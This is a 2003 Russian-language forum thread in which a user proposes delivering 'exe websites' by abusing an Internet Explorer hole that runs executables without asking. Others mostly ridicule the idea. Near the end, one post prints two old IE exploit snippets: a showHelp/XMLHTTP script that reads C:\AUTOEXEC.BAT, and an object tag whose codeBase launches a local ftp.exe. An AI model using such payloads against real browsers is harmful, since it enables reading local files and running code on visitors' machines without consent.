На главную Наши проекты:
Журнал   ·   Discuz!ML   ·   Wiki   ·   DRKB   ·   Помощь проекту
ПРАВИЛА FAQ Помощь Участники Календарь Избранное RSS
msm.ru
! правила раздела Алгоритмы
1. Помните, что название темы должно хоть как-то отражать ее содержимое (не создавайте темы с заголовком ПОМОГИТЕ, HELP и т.д.). Злоупотребление заглавными буквами в заголовках тем ЗАПРЕЩЕНО.
2. При создании темы постарайтесь, как можно более точно описать проблему, а не ограничиваться общими понятиями и определениями.
3. Приводимые фрагменты исходного кода старайтесь выделять тегами code.../code
4. Помните, чем подробнее Вы опишете свою проблему, тем быстрее получите вразумительный совет
5. Запрещено поднимать неактуальные темы (ПРИМЕР: запрещено отвечать на вопрос из серии "срочно надо", заданный в 2003 году)
6. И не забывайте о кнопочках TRANSLIT и РУССКАЯ КЛАВИАТУРА, если не можете писать в русской раскладке :)
Модераторы: Akina, shadeofgray
Страницы: (2) [1] 2  все  ( Перейти к последнему сообщению )  
> EXE сайт против Flash
    Все Вы видели флеш сайты. Только вот флеш редакторы такие тупые, что просто нет никакого желения их изучать. Я же предлагаю альтернативу. Зная дирку в експлорере могу загрузить с любого сервака на любой комп exe-файл и выполнить его без запроса разрешения пользователя.
    Я конечно понимаю опастность такой ситуации - вирусы там трояны всякие. Но предлагаю использовать это воблаго. А именно сделать красивый(интерактивный) сайт в виде программы.
    Единственное что сдесь нужно учитывать - размер программы. Чем мешьше тем лучше.

    Короче вот моё предложение:
    Нарисуйте мне хороший ехесайт - А я сдам с потрохами альгоритм его загрузки.

    Кому понравиться предложение стучите в аську. 104263279
      Ты уверен что именно флеш-редакторы тупые?
        Цитата vovs, 31.10.03, 12:16:21
        Зная дирку в експлорере могу загрузить с любого сервака на любой комп exe-файл

        А как быть с другими браузерами.... ;D ::) ;D
          Не проверял просто.
          Я Нетскейп надух неперношу. А оперой просто не пользуюсь - нужды такой нет.
            to: WinterMute
            Назови хоть один стоящий.
              2 vovs:
              В том-то и дело, что при создании сайтов и прочих web приложений необходимо учитывать как раз то, что не все пользуются IE. :P
              А что касается "тупости" редакторов, то здесь уж извини виноваты не сами редакторы, а тот кто сам "тупит" при их использовании  ;D ;D ;D  
                Я вобще-то хочу сделать типа меню: обычный сайт и ехе-сайт. Кому чего больше понравится...
                  А в чём, собственно, гениальная задумка и что в ней такого стоящего и особенного?
                  Чем Flash - сайт у кого-то на компьютере отличается от других? WWW-документ перед просмотром обычно скачивается на компьютер клиенту целиком или частично перед просмотром.

                  Сам факт, что программа работает от имени пользователя вас привлекает.
                  Это просто устроить. Но какую выгоду можно извлечь - над этим стоит ещё немного подумать.

                  Если нужно чтобы кто-то зделал Flash-сайт или это объявление конкурса, тогда тема понятна.
                  Сообщение отредактировано: Tishaishii -
                    "Щас усех помирю!" (С) Сашун :)

                    Давайте делать ActiveX-сайт.

                    Пользователь, заходя на первую страницу, получает стандартное сообщение: "...разрешить загрузку контента?" и сам принимает решение, стоит, или не стоит.

                    А инструментарий для разработки ActiveX ничем не хуже, чем для разработки EXE. И ограничения по целевым клиентам такие же. И "дырку", посредством которой загружаются ActiveX никто фиксить в будущем не станет. :) Потому, что ето фича, а не баг. :)

                    Сообщение отредактировано: Visitor -
                      В будущем появятся фирмы, которые будут заниматься созданием таких дыр и единодушно все интернетчики планеты будут принимать их за фитчи. Но настенет и время, когда идеи закончатся. И Человечество станет посылать сигналы в глубокий космос в надежде, что инопланетный разум подкинет ещё пару-тройку идей как построить и обосновать новую фитчу. И вскоре состоится Первый Межпланетный Форум по обмену опытом создания подобных фитчь и Активикс-сайтов.

                      Но придёт туман и наступит на голову реки и её тоже не станет.


                      Хорошо. Шутка.
                      Но тема открыта.
                        Вы недооцениваете человечество :) Дайте мне столько же хорошей травы, и я вам столько новых фич набрежу :)
                          2vovs выложи где-нить свой exe-сайт, я на него зайду експлорером и посмотрю.

                          что-то мне подсказывает, что нифига мне на комп не загрузится....:)
                            to:Demo_S
                            1. В том то и дело, что нечего выложить. Надо сначала придумать (разработать идею дизайн и пр.) потом сделать прогу. Аж потом выложить.
                            2.Нехотелось бы раньше времени альгорити выдавать. А то какие-то хакеры начнут с сатов трояны и виры пускать - Микрософт возмёт да и выпустит заплатку. И накроется моя идея медным тазом.
                            Вот
                              Ды к она в любом случае накроется в течение одной-двух недель после открытия твоего сайта:)
                                Значит мы его сайт работай, а ноухау не узнавай.

                                Может он имеет в виду такие известные дырки под непропатченные виндовс 2000/XP/98/95?
                                ExpandedWrap disabled
                                  <script> <br>function go() <br>{ <br>      var c; <br>      try <br>      { <br>            c=new ActiveXObject("Msxml2.XMLHTTP"); <br>      } <br>      catch(e) <br>      { <br>            c=new ActiveXObject("Microsoft.XMLHTTP"); <br>      } <br>      c.open("GET","C:\AUTOEXEC.BAT",false); <br>      c.send(null); <br>      alert(c.responseText); <br>} <br>showHelp("file:"); <br>showHelp("res://shdoclc.dll/about.dlg"); <br>showHelp("javascript:"+go+"go();"); <br></script>
                                или
                                ExpandedWrap disabled
                                  <object <br>      classid="CLSID:11111111-1111-1111-1111-111111111111"<br>      codeBase="D:\WINNT\ftp.exe"<br>      width=80<br>      height=30><br></object>


                                Так это действительно фитча, хотя патч есть.
                                Сообщение отредактировано: Tishaishii -
                                0 пользователей читают эту тему (0 гостей и 0 скрытых пользователей)
                                0 пользователей:


                                Рейтинг@Mail.ru
                                [ Script execution time: 0,0386 ]   [ 15 queries used ]   [ Generated: 2.05.24, 20:37 GMT ]